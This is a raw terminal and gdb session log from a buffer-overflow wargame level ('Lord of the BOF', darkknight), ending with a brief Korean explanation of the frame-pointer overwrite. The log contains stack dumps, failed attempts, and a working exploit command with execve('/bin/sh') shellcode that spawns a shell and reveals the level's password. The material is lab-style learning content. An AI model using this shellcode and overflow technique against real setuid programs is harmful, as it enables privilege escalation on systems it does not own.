0xbffffb28:	0xbffffb74	0x40013868	0x00000003	0x08048390
0xbffffb38:	0x00000000	0x080483b1	0x0804846c	0x00000003
0xbffffb48:	0xbffffb64	0x080482e4	0x080484dc	0x4000ae60
(gdb) 
0xbffffb58:	0xbffffb5c	0x40013e90	0x00000003	0xbffffc5e
0xbffffb68:	0xbffffc6a	0xbffffc74	0x00000000	0xbffffc92
0xbffffb78:	0xbffffcb4	0xbffffcbe	0xbffffccc	0xbffffceb
0xbffffb88:	0xbffffcf9	0xbffffd12	0xbffffd2d	0xbffffd38
0xbffffb98:	0xbffffd46	0xbffffd87	0xbffffd98	0xbffffdad
(gdb) 
0xbffffba8:	0xbffffdbd	0xbffffdc8	0xbffffde5	0xbffffdff
0xbffffbb8:	0xbffffe0a	0xbffffe17	0xbffffe1f	0xbfffffe2
0xbffffbc8:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffbd8:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffbe8:	0x00001000	0x00000007	0x40000000	0x00000008
(gdb) 
0xbffffbf8:	0x00000000	0x00000009	0x08048390	0x0000000b
0xbffffc08:	0x000001ff	0x0000000c	0x000001ff	0x0000000d
0xbffffc18:	0x000001ff	0x0000000e	0x000001ff	0x00000010
0xbffffc28:	0x0fabfbff	0x0000000f	0xbffffc59	0x00000000
0xbffffc38:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) 
0xbffffc48:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc58:	0x38366900	0x2f2e0036	0x6b636164	0x6867696e
0xbffffc68:	0x90bf0074	0x90909090	0x00649090	0x90909090
0xbffffc78:	0x6850c031	0x68732f2f	0x69622f68	0x50e3896e
0xbffffc88:	0x89e18953	0xcd0bb0c2	0x454c0080	0x504f5353
(gdb) q
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*40+"\91x"'`                                                                                                                                    

Segmentation fault (core dumped)
[golem@localhost golem]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./dacknight 
Program terminated with signal 11, Segmentation fault.
#0  0xfb in ?? ()
(gdb) x/20 $esp
0xbffffb08:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb18:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb28:	0x00000000	0xbffffb00	0x0804849e	0xbffffc90
0xbffffb38:	0xbffffb58	0x400309cb	0x00000002	0xbffffb84
0xbffffb48:	0xbffffb90	0x40013868	0x00000002	0x08048390
(gdb) 
0xbffffb58:	0x00000000	0x080483b1	0x0804846c	0x00000002
0xbffffb68:	0xbffffb84	0x080482e4	0x080484dc	0x4000ae60
0xbffffb78:	0xbffffb7c	0x40013e90	0x00000002	0xbffffc84
0xbffffb88:	0xbffffc90	0x00000000	0xbffffc92	0xbffffcb4
0xbffffb98:	0xbffffcbe	0xbffffccc	0xbffffceb	0xbffffcf9
(gdb) 
0xbffffba8:	0xbffffd12	0xbffffd2d	0xbffffd38	0xbffffd46
0xbffffbb8:	0xbffffd87	0xbffffd98	0xbffffdad	0xbffffdbd
0xbffffbc8:	0xbffffdc8	0xbffffde5	0xbffffdff	0xbffffe0a
0xbffffbd8:	0xbffffe17	0xbffffe1f	0xbfffffe2	0x00000000
0xbffffbe8:	0x00000003	0x08048034	0x00000004	0x00000020
(gdb) 
0xbffffbf8:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffc08:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffc18:	0x00000009	0x08048390	0x0000000b	0x000001ff
0xbffffc28:	0x0000000c	0x000001ff	0x0000000d	0x000001ff
0xbffffc38:	0x0000000e	0x000001ff	0x00000010	0x0fabfbff
(gdb) 
0xbffffc48:	0x0000000f	0xbffffc7f	0x00000000	0x00000000
0xbffffc58:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc68:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc78:	0x00000000	0x69000000	0x00363836	0x61642f2e
0xbffffc88:	0x696e6b63	0x00746867	0x454c00fb	0x504f5353
(gdb) 
0xbffffc98:	0x7c3d4e45	0x7273752f	0x6e69622f	0x73656c2f
0xbffffca8:	0x70697073	0x68732e65	0x00732520	0x52455355
0xbffffcb8:	0x454d414e	0x4948003d	0x49535453	0x313d455a
0xbffffcc8:	0x00303030	0x54534f48	0x454d414e	0x636f6c3d
0xbffffcd8:	0x6f686c61	0x6c2e7473	0x6c61636f	0x616d6f64
(gdb) 
0xbffffce8:	0x4c006e69	0x414e474f	0x673d454d	0x6d656c6f
0xbffffcf8:	0x4d455200	0x4845544f	0x3d54534f	0x2e323931
0xbffffd08:	0x2e383631	0x2e353332	0x414d0031	0x2f3d4c49
0xbffffd18:	0x2f726176	0x6f6f7073	0x616d2f6c	0x672f6c69
0xbffffd28:	0x6d656c6f	0x52455400	0x74783d4d	0x006d7265
(gdb) 
0xbffffd38:	0x54534f48	0x45505954	0x3833693d	0x41500036
0xbffffd48:	0x2f3d4854	0x2f727375	0x61636f6c	0x69622f6c
0xbffffd58:	0x622f3a6e	0x2f3a6e69	0x2f727375	0x3a6e6962
0xbffffd68:	0x7273752f	0x3131582f	0x622f3652	0x2f3a6e69
0xbffffd78:	0x656d6f68	0x6c6f672f	0x622f6d65	0x48006e69
(gdb) x/20 $esp
0xbffffb08:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb18:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb28:	0x00000000	0xbffffb00	0x0804849e	0xbffffc90
0xbffffb38:	0xbffffb58	0x400309cb	0x00000002	0xbffffb84
0xbffffb48:	0xbffffb90	0x40013868	0x00000002	0x08048390
(gdb) q
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*40+"\91x"'` 
¿d
Segmentation fault (core dumped)
[golem@localhost golem]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./dacknight ¿d \91x'.
Program terminated with signal 11, Segmentation fault.
#0  0xbffffc63 in ?? ()
(gdb) x/20 $esp-20
0xbffffaf4:	0x00000000	0x00000000	0xbffffb00	0x0804849e
0xbffffb04:	0xbffffc5b	0xbffffb28	0x400309cb	0x00000003
0xbffffb14:	0xbffffb54	0xbffffb64	0x40013868	0x00000003
0xbffffb24:	0x08048390	0x00000000	0x080483b1	0x0804846c
0xbffffb34:	0x00000003	0xbffffb54	0x080482e4	0x080484dc
(gdb) x/20 $esp-40
0xbffffae0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffaf0:	0x00000000	0x00000000	0x00000000	0xbffffb00
0xbffffb00:	0x0804849e	0xbffffc5b	0xbffffb28	0x400309cb
0xbffffb10:	0x00000003	0xbffffb54	0xbffffb64	0x40013868
0xbffffb20:	0x00000003	0x08048390	0x00000000	0x080483b1
(gdb) x/20 $esp-80
0xbffffab8:	0x08048500	0xbffffad4	0x401081ec	0xbffffafc
0xbffffac8:	0x08048466	0x08048500	0xbffffad4	0x909090bf
0xbffffad8:	0x90909090	0x00000064	0x00000000	0x00000000
0xbffffae8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffaf8:	0x00000000	0xbffffb00	0x0804849e	0xbffffc5b
(gdb) 
0xbffffb08:	0xbffffb28	0x400309cb	0x00000003	0xbffffb54
0xbffffb18:	0xbffffb64	0x40013868	0x00000003	0x08048390
0xbffffb28:	0x00000000	0x080483b1	0x0804846c	0x00000003
0xbffffb38:	0xbffffb54	0x080482e4	0x080484dc	0x4000ae60
0xbffffb48:	0xbffffb4c	0x40013e90	0x00000003	0xbffffc4f
(gdb) 
0xbffffb58:	0xbffffc5b	0xbffffc65	0x00000000	0xbffffc92
0xbffffb68:	0xbffffcb4	0xbffffcbe	0xbffffccc	0xbffffceb
0xbffffb78:	0xbffffcf9	0xbffffd12	0xbffffd2d	0xbffffd38
0xbffffb88:	0xbffffd46	0xbffffd87	0xbffffd98	0xbffffdad
0xbffffb98:	0xbffffdbd	0xbffffdc8	0xbffffde5	0xbffffdff
(gdb) 
0xbffffba8:	0xbffffe0a	0xbffffe17	0xbffffe1f	0xbfffffe2
0xbffffbb8:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffbc8:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffbd8:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffbe8:	0x00000000	0x00000009	0x08048390	0x0000000b
(gdb) 
0xbffffbf8:	0x000001ff	0x0000000c	0x000001ff	0x0000000d
0xbffffc08:	0x000001ff	0x0000000e	0x000001ff	0x00000010
0xbffffc18:	0x0fabfbff	0x0000000f	0xbffffc4a	0x00000000
0xbffffc28:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc38:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) 
0xbffffc48:	0x36690000	0x2e003638	0x6361642f	0x67696e6b
0xbffffc58:	0xbf007468	0x90909090	0x64909090	0x90909000
0xbffffc68:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc78:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc88:	0x90909090	0x31395c90	0x454c0078	0x504f5353
(gdb) 
0xbffffc98:	0x7c3d4e45	0x7273752f	0x6e69622f	0x73656c2f
0xbffffca8:	0x70697073	0x68732e65	0x00732520	0x52455355
0xbffffcb8:	0x454d414e	0x4948003d	0x49535453	0x313d455a
0xbffffcc8:	0x00303030	0x54534f48	0x454d414e	0x636f6c3d
0xbffffcd8:	0x6f686c61	0x6c2e7473	0x6c61636f	0x616d6f64
(gdb) q
[golem@localhost golem]$ exit
logout
Connection closing...Socket close.

Connection closed by foreign host.

Disconnected from remote host(LOB) at 01:18:50.

Type `help' to learn how to use Xshell prompt.
[c:\~]$ 


























Xshell 5 (Build 1339)
Copyright (c) 2002-2017 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
[c:\~]$ 

Connecting to 192.168.235.128:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
                                            _______________________
  _______________________-------------------                       `\
 /:--__                                                              |
||< > |                                   ___________________________/
| \__/_________________-------------------                         |
|                                                                  |
 |        The Lord of the BOF : The Fellowship of the BOF, 2010    |
 |                                                                  |
 |                                                                  |
  |       [enter to the dungeon]                                    |
  |       gate : gate                                                |
  |                                                                  |
  |       [RULE]                                                     |
   |      - do not use local root exploit                             |
   |      - do not use LD_PRELOAD to my-pass                          |
   |      - do not use single boot                    [h4ck3rsch001] |
  |                                              ____________________|_
  |  ___________________-------------------------                      `\
  |/`--_                                                                 |
  ||[ ]||                                            ___________________/
   \===/___________________-------------------------- 


login: golem
Password: 
Login incorrect

login: golem
Password: 
Last login: Tue May 15 13:22:21 from 192.168.235.1
[golem@localhost golem]$ ls
core  dacknight  darkknight  darkknight.c
[golem@localhost golem]$ g
bash: g: command not found
[golem@localhost golem]$ bash2
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*40+"\x91"'`
5       @ 
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*40+"\x91"'`
5       @ 
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*40+"\x91"'`
5       @ 
Segmentation fault (core dumped)
[golem@localhost golem]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./dacknight '.
Program terminated with signal 11, Segmentation fault.
#0  0x401069 in ?? ()
(gdb) x/20 $esp-40
0xbffffa71:	0xa440021d	0x70bffffa	0x5e4000a9	0xdcbffffc
0xbffffa81:	0x20bffffa	0xe04005d9	0xa4400143	0x70bffffa
0xbffffa91:	0x80400660	0x00401069	0xb4080485	0xecbffffa
0xbffffaa1:	0xdc401081	0x66bffffa	0x00080484	0xb4080485
0xbffffab1:	0x90bffffa	0x90909090	0x90909090	0x90909090
(gdb) 
0xbffffac1:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffad1:	0x90909090	0x90909090	0x91909090	0x9ebffffa
0xbffffae1:	0x35080484	0x08bffffc	0xcbbffffb	0x02400309
0xbffffaf1:	0x34000000	0x40bffffb	0x68bffffb	0x02400138
0xbffffb01:	0x90000000	0x00080483	0xb1000000	0x6c080483
(gdb) x/20 $esp-41
0xbffffa70:	0x40021df0	0xbffffaa4	0x4000a970	0xbffffc5e
0xbffffa80:	0xbffffadc	0x4005d920	0x400143e0	0xbffffaa4
0xbffffa90:	0x40066070	0x40106980	0x08048500	0xbffffab4
0xbffffaa0:	0x401081ec	0xbffffadc	0x08048466	0x08048500
0xbffffab0:	0xbffffab4	0x90909090	0x90909090	0x90909090
(gdb) 
0xbffffac0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffad0:	0x90909090	0x90909090	0x90909090	0xbffffa91
0xbffffae0:	0x0804849e	0xbffffc35	0xbffffb08	0x400309cb
0xbffffaf0:	0x00000002	0xbffffb34	0xbffffb40	0x40013868
0xbffffb00:	0x00000002	0x08048390	0x00000000	0x080483b1
(gdb) q
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\xac"'`
1￐h//shh/bin⏓ኂ°
               ̀ÿÿÿ¿ÿ¬5 @ 
bash$ q
sh: q: command not found
bash$ exit
exit
[golem@localhost golem]$ ./darkknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\xac"'`
1￐h//shh/bin⏓ኂ°
               ̀ÿÿÿ¿ÿ¬3 @ 
bash$ my-pass
euid = 512
new attacker
bash$ 





0xbffffab0:	0xbffffab4
이 주소를 이용해서 풀었다. 
bffffab4가 버퍼의 시작주소를 가리킨다.

그래서 ebp를 bffffab0-4인 곳으로 조작해서 +8인 bffffab0주소의 값(bffffab4)가 eip에 들어간다.

